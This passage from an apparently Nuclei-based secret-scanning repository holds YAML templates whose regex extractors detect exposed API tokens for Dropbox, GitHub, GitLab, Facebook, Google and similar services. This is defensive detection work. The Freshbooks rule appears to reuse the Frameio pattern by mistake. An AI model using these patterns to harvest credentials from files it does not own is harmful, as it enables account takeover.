https://github.com/praetorian-inc/noseyparker/blob/main/crates/noseyparker/data/default/builtin/rules/dropbox.yml 9 | - https://developers.dropbox.com/oauth-guide 10 | - https://www.dropbox.com/developers/ 11 | - https://www.dropbox.com/developers/documentation/http/documentation 12 | metadata: 13 | verified: true 14 | tags: dropbox,keys,file 15 | 16 | file: 17 | - extensions: 18 | - all 19 | 20 | extractors: 21 | - type: regex 22 | part: body 23 | regex: 24 | - \b(sl\.[a-zA-Z0-9_-]{130,152})(?:$|[^a-zA-Z0-9_-]) 25 | # digest: 490a0046304402203d0305c1997e320e30d2d0ad0460beb9c8478986a0f1b75f621167a79f8ca17302206da5b41a7402312c0d16fc2665349e3caf8aac3cee677a34f34089d739a743c6:922c64590222798bb761d5b6d8e72950 -------------------------------------------------------------------------------- /scan/gadget/sensitive/keys/dropbox/dropbox-api-token.yaml: -------------------------------------------------------------------------------- 1 | id: dropbox-api-token 2 | 3 | info: 4 | name: Dropbox API Token 5 | author: DhiyaneshDK 6 | severity: info 7 | reference: 8 | - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/dropbox-api-token.yaml 9 | - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/dropbox-api-token.go 10 | metadata: 11 | verified: true 12 | tags: file,keys,dropbox,token 13 | 14 | file: 15 | - extensions: 16 | - all 17 | 18 | extractors: 19 | - type: regex 20 | part: body 21 | regex: 22 | - (?i)(?:dropbox)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9]{15})(?:['|\"|\n|\r|\s|\x60|;]|$) 23 | # digest: 4a0a00473045022100e195768a79de92a350e9ebbad15bac8d585c15a3990f36e0090992948eba7f0002203a3094d187586339c95b773f2a4c5f68f4dcc23bcebea94b0e590dc3751053b7:922c64590222798bb761d5b6d8e72950 -------------------------------------------------------------------------------- /scan/gadget/sensitive/keys/duffel-api-token.yaml: -------------------------------------------------------------------------------- 1 | id: duffel-api-token 2 | 3 | info: 4 | name: Duffel API Token 5 | author: DhiyaneshDK 6 | severity: info 7 | reference: 8 | - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/duffel-api-token.yaml 9 | - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/duffel-api-token.go 10 | metadata: 11 | verified: true 12 | tags: keys,file,duffel,token 13 | file: 14 | - extensions: 15 | - all 16 | 17 | extractors: 18 | - type: regex 19 | part: body 20 | regex: 21 | - duffel_(test|live)_(?i)[a-z0-9_\-=]{43} 22 | # digest: 4a0a0047304502202421c143203a023a8285876328e3581df769889a541d51b3bdcf72ab8fc117ff022100cb6b572f959e94b842ee120dd67fb14cafc499e3b4b6d4665dd07eb3e53b60f3:922c64590222798bb761d5b6d8e72950 -------------------------------------------------------------------------------- /scan/gadget/sensitive/keys/dynatrace-token.yaml: -------------------------------------------------------------------------------- 1 | id: dynatrace-token 2 | 3 | info: 4 | name: Dynatrace Token - Detect 5 | author: gaurang 6 | severity: high 7 | description: Dynatrace token was detected. 8 | classification: 9 | cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 10 | cvss-score: 7.5 11 | cwe-id: CWE-200 12 | tags: file,keys,token 13 | file: 14 | - extensions: 15 | - all 16 | 17 | extractors: 18 | - type: regex 19 | regex: 20 | - "dt0[a-zA-Z]{1}[0-9]{2}\\.[A-Z0-9]{24}\\.[A-Z0-9]{64}" 21 | 22 | # Enhanced by md on 2023/05/04 23 | # digest: 4a0a00473045022100ab64299fac317f6ebc2349e91b5e7fb30e50b5c612e13c00d561ee816089222602207a3b30fbfc67583401a9e652198a3dc609e1877e0f5451748c91df5ac5a1fffa:922c64590222798bb761d5b6d8e72950 -------------------------------------------------------------------------------- /scan/gadget/sensitive/keys/easypost/easypost-api-token.yaml: -------------------------------------------------------------------------------- 1 | id: easypost-api-token 2 | 3 | info: 4 | name: Easypost Test API Token 5 | author: DhiyaneshDK 6 | severity: info 7 | reference: 8 | - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/easypost-api-token.go 9 | - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/easypost-api-token.yaml 10 | metadata: 11 | verified: true 12 | tags: file,keys,easypost,token 13 | 14 | file: 15 | - extensions: 16 | - all 17 | 18 | extractors: 19 | - type: regex 20 | part: body 21 | regex: 22 | - EZAK(?i)[a-z0-9]{54} 23 | # digest: 4b0a00483046022100e61496ecd8994a3249bfa7ced4fdb49d6518b2b47fc556b3e611abeecd64c2c1022100c69eb40905d2e780d9e2a07b44b0a0956cbfc868c0b9e46c93421e26a73b9c21:922c64590222798bb761d5b6d8e72950 -------------------------------------------------------------------------------- /scan/gadget/sensitive/keys/easypost/easypost-test-token.yaml: -------------------------------------------------------------------------------- 1 | id: easypost-test-token 2 | 3 | info: 4 | name: Easypost Test API Token 5 | author: DhiyaneshDK 6 | severity: info 7 | reference: 8 | - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/easypost-test-api-token.go 9 | - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/easypost-test-api-token.yaml 10 | metadata: 11 | verified: true 12 | tags: file,keys,easypost,token 13 | 14 | file: 15 | - extensions: 16 | - all 17 | 18 | extractors: 19 | - type: regex 20 | part: body 21 | regex: 22 | - EZTK(?i)[a-z0-9]{54} 23 | # digest: 4b0a00483046022100a8a903d8c12982d4215d7d686683821b3a72ee119e106b1c62de92ea9e2e8891022100dda07ef96999d284589a8ab9524c24512ac4e4be6190717fd70fb0837e99b08d:922c64590222798bb761d5b6d8e72950 -------------------------------------------------------------------------------- /scan/gadget/sensitive/keys/etsy-access-token.yaml: -------------------------------------------------------------------------------- 1 | id: etsy-access-token 2 | 3 | info: 4 | name: Etsy Access Token 5 | author: DhiyaneshDK 6 | severity: info 7 | reference: 8 | - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/etsy-access-token.yaml 9 | - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/etsy-access-token.go 10 | metadata: 11 | verified: true 12 | tags: file,keys,etsy,token 13 | file: 14 | - extensions: 15 | - all 16 | 17 | extractors: 18 | - type: regex 19 | part: body 20 | regex: 21 | - (?i)(?:etsy)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9]{24})(?:['|\"|\n|\r|\s|\x60|;]|$) 22 | # digest: 4a0a00473045022060ce8a53571f37202449c1685892f383465c312d2048578d5a202817d0611dfe022100e934a548eea41ac9818e3efffe2c9da795a395f884d4a1f10c0392de726fcf15:922c64590222798bb761d5b6d8e72950 -------------------------------------------------------------------------------- /scan/gadget/sensitive/keys/facebook/facebook-api-token.yaml: -------------------------------------------------------------------------------- 1 | id: facebook-api-token 2 | 3 | info: 4 | name: Facebook API Token 5 | author: DhiyaneshDK 6 | severity: info 7 | reference: 8 | - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/facebook.yaml 9 | - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/facebook.go 10 | metadata: 11 | verified: true 12 | tags: keys,file,facebook,token 13 | 14 | file: 15 | - extensions: 16 | - all 17 | 18 | extractors: 19 | - type: regex 20 | part: body 21 | regex: 22 | - (?i)(?:facebook)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-f0-9]{32})(?:['|\"|\n|\r|\s|\x60|;]|$) 23 | # digest: 4a0a00473045022039cfc3385a5e54130639427498934edb6851cbbfa0cb2fa9e0766c80de9c2f06022100a24d18ff30e17c296e32f42a80fee23cf4ae78eb0e82b85e1b399663945788f7:922c64590222798bb761d5b6d8e72950 -------------------------------------------------------------------------------- /scan/gadget/sensitive/keys/facebook/facebook-client-id.yaml: -------------------------------------------------------------------------------- 1 | id: facebook-client-id 2 | 3 | info: 4 | name: Facebook Client ID - Detect 5 | author: gaurang 6 | severity: info 7 | description: Facebook client ID token was detected. 8 | classification: 9 | cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N 10 | cvss-score: 0 11 | cwe-id: CWE-200 12 | tags: keys,file,token,facebook 13 | 14 | file: 15 | - extensions: 16 | - all 17 | 18 | extractors: 19 | - type: regex 20 | regex: 21 | - "(?i)(facebook|fb)(.{0,20})?['\"][0-9]{13,17}['\"]" 22 | 23 | # Enhanced by md on 2023/05/04 24 | # digest: 490a0046304402205c3ed81a6b30472131610c16c17b09e837f4a50a24ea7855646cd4f63681693102206d187a7c8a35d1a8a6d44bc7ffb3df51f06401d98e210d0f0233744e5cf0496b:922c64590222798bb761d5b6d8e72950 -------------------------------------------------------------------------------- /scan/gadget/sensitive/keys/facebook/facebook-secret.yaml: -------------------------------------------------------------------------------- 1 | id: facebook-secret-key 2 | 3 | info: 4 | name: Facebook Secret Key - Detect 5 | author: gaurang 6 | severity: low 7 | description: Facebook secret key token was detected. 8 | tags: keys,file,token,facebook 9 | 10 | file: 11 | - extensions: 12 | - all 13 | 14 | extractors: 15 | - type: regex 16 | regex: 17 | - "(?i)(facebook|fb)(.{0,20})?(?-i)['\"][0-9a-f]{32}['\"]" 18 | # digest: 490a004630440220088a4482a94c06fc1c8f203f3c7c1bb1c49303682b030f8012e682c9b0b1a4d6022069258d660c85e0daa2e6406090f1d54b78ac348fbb963c372d123327433408ee:922c64590222798bb761d5b6d8e72950 -------------------------------------------------------------------------------- /scan/gadget/sensitive/keys/facebook/fb-access-token.yaml: -------------------------------------------------------------------------------- 1 | id: fb-access-token 2 | 3 | info: 4 | name: Facebook Access Token 5 | author: DhiyaneshDK 6 | severity: info 7 | reference: 8 | - https://github.com/praetorian-inc/noseyparker/blob/main/data/default/rules/facebook.yml 9 | - https://developers.facebook.com/docs/facebook-login/access-tokens/ 10 | metadata: 11 | verified: true 12 | tags: file,keys,facebook,token 13 | 14 | file: 15 | - extensions: 16 | - all 17 | 18 | extractors: 19 | - type: regex 20 | part: body 21 | regex: 22 | - '\b(EAACEdEose0cBA[a-zA-Z0-9]+)\b' 23 | # digest: 4b0a00483046022100906343469fb8f96da3ccf0963909ce5c20670bdff9d3b67347567d8983225e880221008bae64c94e2bbd5ae50d2d96d011e27e00695b52e82a7be86533132940bd8095:922c64590222798bb761d5b6d8e72950 -------------------------------------------------------------------------------- /scan/gadget/sensitive/keys/fastly-api-token.yaml: -------------------------------------------------------------------------------- 1 | id: fastly-api-token 2 | 3 | info: 4 | name: Fastly API Token 5 | author: DhiyaneshDK 6 | severity: info 7 | reference: 8 | - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/fastly-api-token.yaml 9 | - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/fastly-api-token.go 10 | metadata: 11 | verified: true 12 | tags: keys,file,fastly,token 13 | file: 14 | - extensions: 15 | - all 16 | 17 | extractors: 18 | - type: regex 19 | part: body 20 | regex: 21 | - (?i)(?:fastly)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9=_\-]{32})(?:['|\"|\n|\r|\s|\x60|;]|$) 22 | # digest: 4b0a00483046022100d8441e43f35e1384e748abac2ddc93f5e90a14d06b06fb6f76e4762dcbe29ea602210095180944d4b581d9d4ee114b75f3ee2d820269c52e7da2d4d8a105f3e245a0ba:922c64590222798bb761d5b6d8e72950 -------------------------------------------------------------------------------- /scan/gadget/sensitive/keys/fcm-api-key.yaml: -------------------------------------------------------------------------------- 1 | id: fcm-api-key 2 | 3 | info: 4 | name: Firebase Cloud Messaging Token 5 | author: Devang-Solanki 6 | severity: medium 7 | tags: file,keys,token,fcm,firebase,google 8 | file: 9 | - extensions: 10 | - all 11 | 12 | extractors: 13 | - type: regex 14 | regex: 15 | - '[A-Za-z0-9-_]+:APA91b[A-Za-z0-9-_#]+' 16 | # digest: 4a0a00473045022041f056406b85bb039bce810b2835a5ab8a446a6b6dfac1a5656b0ff7bff221f2022100b130f489cf048057110e68b3a5d891878db9a6bc0d486eb07842a6f37510479a:922c64590222798bb761d5b6d8e72950 -------------------------------------------------------------------------------- /scan/gadget/sensitive/keys/figma-access-token.yaml: -------------------------------------------------------------------------------- 1 | id: figma-access-token 2 | 3 | info: 4 | name: Figma Personal Access Token 5 | author: DhiyaneshDK 6 | severity: info 7 | reference: 8 | - https://github.com/praetorian-inc/noseyparker/blob/main/crates/noseyparker/data/default/rules/figma.yml 9 | - https://www.figma.com/developers/api 10 | metadata: 11 | verified: true 12 | tags: file,keys,figma,token 13 | file: 14 | - extensions: 15 | - all 16 | 17 | extractors: 18 | - type: regex 19 | part: body 20 | regex: 21 | - (?i)figma.{0,20}\b([0-9a-f]{4}-[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12})\b 22 | # digest: 4a0a00473045022100cbc7b923b9821d8b0da62a6152e2c9887062352d3f428e626da0e38bd455b6fe02201a9d7e25bc38f63682229f636ca9733c20b8de5e05453cd9ef09cda9f87186f8:922c64590222798bb761d5b6d8e72950 -------------------------------------------------------------------------------- /scan/gadget/sensitive/keys/finicity/finicity-api-token.yaml: -------------------------------------------------------------------------------- 1 | id: finicity-api-token 2 | 3 | info: 4 | name: Finicity API Token 5 | author: DhiyaneshDK 6 | severity: info 7 | reference: 8 | - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/finicity-api-token.yaml 9 | - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/finicity-api-token.go 10 | metadata: 11 | verified: true 12 | tags: file,keys,finicity,token 13 | file: 14 | - extensions: 15 | - all 16 | 17 | extractors: 18 | - type: regex 19 | part: body 20 | regex: 21 | - (?i)(?:finicity)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-f0-9]{32})(?:['|\"|\n|\r|\s|\x60|;]|$) 22 | # digest: 4b0a00483046022100f241e2b7819d9662106d68984ceab12ce6488feefc724d94bc7a131c814f1bc3022100d335261dd3b17fa626f653da06a0287f63003626693e3a6ae7dc137786af7a13:922c64590222798bb761d5b6d8e72950 -------------------------------------------------------------------------------- /scan/gadget/sensitive/keys/finnhub-access-token.yaml: -------------------------------------------------------------------------------- 1 | id: finnhub-access-token 2 | 3 | info: 4 | name: Finnhub Access Token 5 | author: DhiyaneshDK 6 | severity: info 7 | reference: 8 | - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/finnhub-access-token.yaml 9 | - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/finnhub-access-token.go 10 | metadata: 11 | verified: true 12 | tags: file,keys,finnhub,token 13 | file: 14 | - extensions: 15 | - all 16 | 17 | extractors: 18 | - type: regex 19 | part: body 20 | regex: 21 | - (?i)(?:finnhub)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9]{20})(?:['|\"|\n|\r|\s|\x60|;]|$) 22 | # digest: 4a0a00473045022100b50377388b15123b007f295e2b22c113fbbf59ec497c11f8245addf21da0d8a402200d62fc352af0319cc578ce82baed797de40b401a4885bd1abd5351225f01e68f:922c64590222798bb761d5b6d8e72950 -------------------------------------------------------------------------------- /scan/gadget/sensitive/keys/firebase-database.yaml: -------------------------------------------------------------------------------- 1 | id: firebase-database 2 | 3 | info: 4 | name: Firebase Database Detect 5 | author: gaurang 6 | severity: info 7 | tags: file,keys,token,firebase 8 | file: 9 | - extensions: 10 | - all 11 | 12 | extractors: 13 | - type: regex 14 | regex: 15 | - "[a-z0-9.-]+\\.firebaseio\\.com" 16 | - "[a-z0-9.-]+\\.firebaseapp\\.com" 17 | # digest: 490a004630440220035a4d1d44e47b7b20a0944a2cfe2939806e33f5341fa5ccf188db65d7aa8e0802203d0226609d88e9be2f2c31212b32ec0a6785a3855820655cb94c95fa66f738a0:922c64590222798bb761d5b6d8e72950 -------------------------------------------------------------------------------- /scan/gadget/sensitive/keys/flickr-access-token.yaml: -------------------------------------------------------------------------------- 1 | id: flickr-access-token 2 | 3 | info: 4 | name: Flickr Access Token 5 | author: DhiyaneshDK 6 | severity: info 7 | reference: 8 | - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/flickr-access-token.yaml 9 | - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/flickr-access-token.go 10 | metadata: 11 | verified: true 12 | tags: flickr,file,keys 13 | file: 14 | - extensions: 15 | - all 16 | 17 | extractors: 18 | - type: regex 19 | part: body 20 | regex: 21 | - (?i)(?:flickr)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9]{32})(?:['|\"|\n|\r|\s|\x60|;]|$) 22 | 23 | # digest: 4a0a00473045022100e34de1ee37b96835acda1132433eec7c4b02c2a35b1139ae4b8e5aaa38e85e5e0220612e97d89129b040693343da576a8d7eee35944a3769c76dd269f5602e0d02db:922c64590222798bb761d5b6d8e72950 24 | -------------------------------------------------------------------------------- /scan/gadget/sensitive/keys/flutter/flutterwave-encryption-key.yaml: -------------------------------------------------------------------------------- 1 | id: flutterwave-encryption-key 2 | 3 | info: 4 | name: Flutterwave Encryption Key 5 | author: DhiyaneshDK 6 | severity: info 7 | reference: 8 | - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/flutterwave-encryption-key.yaml 9 | - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/flutterwave-encryption-key.go 10 | metadata: 11 | verified: true 12 | tags: flutter,file,keys,flutterwave 13 | file: 14 | - extensions: 15 | - all 16 | 17 | extractors: 18 | - type: regex 19 | part: body 20 | regex: 21 | - FLWSECK_TEST-(?i)[a-h0-9]{12} 22 | 23 | # digest: 490a00463044022001bb728280f64a65aad5cf17534d751dbe1cda89c68bb06251a2232fe7ca0810022037d2fb62e03bd86162102d5d381a0c5a6c54728628a5381af1eeaac926773f91:922c64590222798bb761d5b6d8e72950 24 | -------------------------------------------------------------------------------- /scan/gadget/sensitive/keys/flutter/flutterwave-public-key.yaml: -------------------------------------------------------------------------------- 1 | id: flutterwave-public-key 2 | 3 | info: 4 | name: Flutterwave Public Key 5 | author: DhiyaneshDK 6 | severity: info 7 | reference: 8 | - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/flutterwave-public-key.go 9 | - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/flutterwave-public-key.yaml 10 | metadata: 11 | verified: true 12 | tags: flutter,file,keys,flutterwave 13 | file: 14 | - extensions: 15 | - all 16 | 17 | extractors: 18 | - type: regex 19 | part: body 20 | regex: 21 | - FLWPUBK_TEST-(?i)[a-h0-9]{32}-X 22 | 23 | # digest: 4a0a0047304502201663f48cdd3af7e4e844c938a840b398231226cf267ce2b9b71aee64b4f01b070221009b15d106d4003dba20c9c1de1a7531478ba5abe063299fa31fad81343c1b8e07:922c64590222798bb761d5b6d8e72950 24 | -------------------------------------------------------------------------------- /scan/gadget/sensitive/keys/flutter/flutterwave-secret-key.yaml: -------------------------------------------------------------------------------- 1 | id: flutterwave-secret-key 2 | 3 | info: 4 | name: Flutterwave Secret Key 5 | author: DhiyaneshDK 6 | severity: info 7 | reference: 8 | - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/flutterwave-secret-key.yaml 9 | - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/flutterwave-secret-key.go 10 | metadata: 11 | verified: true 12 | tags: flutter,file,keys,flutterwave 13 | file: 14 | - extensions: 15 | - all 16 | 17 | extractors: 18 | - type: regex 19 | part: body 20 | regex: 21 | - FLWSECK_TEST-(?i)[a-h0-9]{32}-X 22 | 23 | # digest: 4a0a00473045022100ef800d5ff9a0070b05c95c26fea14222a4efb0739951eea468e07f08ccef665a022008c000020cb1a4316a03521c4fd6d3af85de85340d924cff0d0936b80b1ed85f:922c64590222798bb761d5b6d8e72950 24 | -------------------------------------------------------------------------------- /scan/gadget/sensitive/keys/frameio-api-token.yaml: -------------------------------------------------------------------------------- 1 | id: frameio-api-token 2 | 3 | info: 4 | name: Frameio API Token 5 | author: DhiyaneshDK 6 | severity: info 7 | reference: 8 | - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/frameio-api-token.yaml 9 | - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/frameio-api-token.go 10 | metadata: 11 | verified: true 12 | tags: frameio,file,keys 13 | file: 14 | - extensions: 15 | - all 16 | 17 | extractors: 18 | - type: regex 19 | part: body 20 | regex: 21 | - fio-u-(?i)[a-z0-9\-_=]{64} 22 | 23 | # digest: 4a0a0047304502200c5a4dfba3c1a826c28c745bd3debafd32fa105a12cd37a5c018300440233ad8022100836571fe9c99297bbbcd639faaac0f0b856d4a6049e8fcc201537c5068d7ac57:922c64590222798bb761d5b6d8e72950 24 | -------------------------------------------------------------------------------- /scan/gadget/sensitive/keys/freshbooks-access-token.yaml: -------------------------------------------------------------------------------- 1 | id: freshbooks-access-token 2 | 3 | info: 4 | name: Freshbooks Access Token 5 | author: DhiyaneshDK 6 | severity: info 7 | reference: 8 | - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/freshbooks-access-token.yaml 9 | - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/freshbooks-access-token.go 10 | metadata: 11 | verified: true 12 | tags: freshbooks,file,keys 13 | file: 14 | - extensions: 15 | - all 16 | 17 | extractors: 18 | - type: regex 19 | part: body 20 | regex: 21 | - fio-u-(?i)[a-z0-9\-_=]{64} 22 | 23 | # digest: 490a004630440220373919559ed5f79b42f4628fe2e75f9de9582f7447fdd43a711fe32f13993ece02207d990413ca61229e70e14b9d17990afbec9396475b33ba44faf734c9e4e27c16:922c64590222798bb761d5b6d8e72950 24 | -------------------------------------------------------------------------------- /scan/gadget/sensitive/keys/gcp-service-account.yaml: -------------------------------------------------------------------------------- 1 | id: gcp-service-account 2 | 3 | info: 4 | name: Google (GCP) Service-account 5 | author: gaurang 6 | severity: low 7 | tags: file,keys,token,google 8 | file: 9 | - extensions: 10 | - all 11 | 12 | extractors: 13 | - type: regex 14 | regex: 15 | - "\"type\": \"service_account\"" 16 | # digest: 4a0a00473045022100cb6dcfa7dcc1544a9d22b921bfe6ea06c853f81c2dba5230df89bb222cded8390220220342a2699d75a6104f3af08f65b6bc97b873889fadf53fb7214b9b712dd5f2:922c64590222798bb761d5b6d8e72950 -------------------------------------------------------------------------------- /scan/gadget/sensitive/keys/github/github-app-token.yaml: -------------------------------------------------------------------------------- 1 | id: github-app-token 2 | 3 | info: 4 | name: Github App Token 5 | author: tanq16,DhiyaneshDK 6 | severity: medium 7 | tags: keys,file,token,github 8 | file: 9 | - extensions: 10 | - all 11 | 12 | extractors: 13 | - type: regex 14 | regex: 15 | - "\b((?:ghu|ghs)_[a-zA-Z0-9]{36})\b" 16 | # digest: 4b0a00483046022100b9d3d1fd11451fe2d5bb3cc0d433ee22cae5ca24e86f5b60845cb3103ad053fe0221009741eb11789fe97cedd0f7fb821d82fa102bb7b65a4f00a99e9c3f2792cb8306:922c64590222798bb761d5b6d8e72950 -------------------------------------------------------------------------------- /scan/gadget/sensitive/keys/github/github-oauth-token.yaml: -------------------------------------------------------------------------------- 1 | id: github-oauth-token 2 | 3 | info: 4 | name: Github OAuth Access Token 5 | author: tanq16 6 | severity: high 7 | tags: file,keys,token,github 8 | file: 9 | - extensions: 10 | - all 11 | 12 | extractors: 13 | - type: regex 14 | regex: 15 | - "gho_.{36}" 16 | # digest: 4a0a004730450221008c53926b33a3b4059610c1a3fea1979833257a4acc6a7b3f42f1be341cd326320220284a515e5b905b6e7eb5cfba9858b243614aaceaf6da411d2e1cd9368de769fe:922c64590222798bb761d5b6d8e72950 -------------------------------------------------------------------------------- /scan/gadget/sensitive/keys/github/github-personal-token.yaml: -------------------------------------------------------------------------------- 1 | id: github-personal-token 2 | 3 | info: 4 | name: Github Personal Token 5 | author: geeknik 6 | severity: high 7 | tags: file,keys,token,github 8 | file: 9 | - extensions: 10 | - all 11 | 12 | extractors: 13 | - type: regex 14 | regex: 15 | - "ghp_.{36}" 16 | - "github_pat_.{82}" 17 | # digest: 4a0a0047304502203c2ec1412ad731d19d011f31640fed087cbff2458bb3566ef8b6eeab67685fb7022100ff8093aefd8308c39e24dd35a59ced0166d4d5142d2d53104ae639032ca9693f:922c64590222798bb761d5b6d8e72950 -------------------------------------------------------------------------------- /scan/gadget/sensitive/keys/github/github-refresh-token.yaml: -------------------------------------------------------------------------------- 1 | id: github-refresh-token 2 | 3 | info: 4 | name: Github Refresh Token 5 | author: tanq16 6 | severity: high 7 | tags: file,keys,token,github 8 | file: 9 | - extensions: 10 | - all 11 | 12 | extractors: 13 | - type: regex 14 | regex: 15 | - "ghr_.{76}" 16 | # digest: 4a0a0047304502206bdea7a5561d353ecf0a6457d342c940765d8eb423c3755d8333abf20dd73a4c022100bd0ba1e3a2ae3c4a5f075e75be2bf4db20ed798233f99cc306f29b550ec7a054:922c64590222798bb761d5b6d8e72950 -------------------------------------------------------------------------------- /scan/gadget/sensitive/keys/gitlab/gitlab-personal-accesstoken.yaml: -------------------------------------------------------------------------------- 1 | id: gitlab-personal-accesstoken 2 | 3 | info: 4 | name: GitLab Personal Access Token 5 | author: DhiyaneshDK 6 | severity: info 7 | reference: 8 | - https://github.com/praetorian-inc/noseyparker/blob/main/data/default/rules/gitlab.yml 9 | - https://docs.gitlab.com/ee/user/profile/personal_access_tokens.html 10 | metadata: 11 | verified: true 12 | tags: file,keys,gitlab,token 13 | file: 14 | - extensions: 15 | - all 16 | 17 | extractors: 18 | - type: regex 19 | part: body 20 | regex: 21 | - '\b(glpat-[0-9a-zA-Z_-]{20})(?:\b|$)' 22 | # digest: 4a0a00473045022100d8f81a139d1a55d53b48483cf5f37388a5aa00533518f37e62262ce7d746a8e30220645f888c251b51c3e07bb926d8f51c1bc02d0e34e1970911c9aa95395364078b:922c64590222798bb761d5b6d8e72950 -------------------------------------------------------------------------------- /scan/gadget/sensitive/keys/gitlab/gitlab-pipeline-triggertoken.yaml: -------------------------------------------------------------------------------- 1 | id: gitlab-pipeline-triggertoken 2 | 3 | info: 4 | name: GitLab Pipeline Trigger Token 5 | author: DhiyaneshDK 6 | severity: info 7 | reference: 8 | - https://github.com/praetorian-inc/noseyparker/blob/main/data/default/rules/gitlab.yml 9 | - https://docs.gitlab.com/ee/ci/triggers/ 10 | - https://gitlab.com/gitlab-org/gitlab/-/issues/371396 11 | - https://gitlab.com/gitlab-org/gitlab/-/issues/388379 12 | metadata: 13 | verified: true 14 | tags: keys,file,gitlab,token 15 | file: 16 | - extensions: 17 | - all 18 | 19 | extractors: 20 | - type: regex 21 | part: body 22 | regex: 23 | - '\b(glptt-[0-9a-f]{40})\b' 24 | # digest: 4a0a004730450221008cbf4eb94765a87a19f157f6c0c8c2bdf2065beccbd30d912cc939db48373953022029b0256eda9ca89370a55cd4af46c29517647ada90ad11704cd7dd580313882d:922c64590222798bb761d5b6d8e72950 -------------------------------------------------------------------------------- /scan/gadget/sensitive/keys/gitter-access-token.yaml: -------------------------------------------------------------------------------- 1 | id: gitter-access-token 2 | 3 | info: 4 | name: Gitter Access Token 5 | author: DhiyaneshDK 6 | severity: info 7 | reference: 8 | - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/gitter-access-token.yaml 9 | - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/gitter-access-token.go 10 | metadata: 11 | verified: true 12 | tags: gitter,file,keys 13 | file: 14 | - extensions: 15 | - all 16 | 17 | extractors: 18 | - type: regex 19 | part: body 20 | regex: 21 | - (?i)(?:gitter)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9_-]{40})(?:['|\"|\n|\r|\s|\x60|;]|$) 22 | 23 | # digest: 4a0a00473045022024b31fc9eb1fabba2e0853bff3057754737098dce170f37dae5b48e451e37adf022100cadc0986bb67a10f42b716e69921383c00f6e61fdc87f2bfded8780288c024c5:922c64590222798bb761d5b6d8e72950 24 | -------------------------------------------------------------------------------- /scan/gadget/sensitive/keys/google/google-api.yaml: -------------------------------------------------------------------------------- 1 | id: google-api-key-file 2 | 3 | info: 4 | name: Google API key 5 | author: gaurang 6 | severity: info 7 | tags: keys,file,token,google 8 | file: 9 | - extensions: 10 | - all 11 | 12 | extractors: 13 | - type: regex 14 | regex: 15 | - "AIza[0-9A-Za-z\\-_]{35}" 16 | # digest: 4a0a00473045022100d10b8c8ea01d04d065a9d13f5f60048a32c908cc2c5a3f9b4ddcb5ba2f7e823a022039f78018968a42018e32f1a2ccb17df81b9255d14d9094659d95e160eb09eb4a:922c64590222798bb761d5b6d8e72950 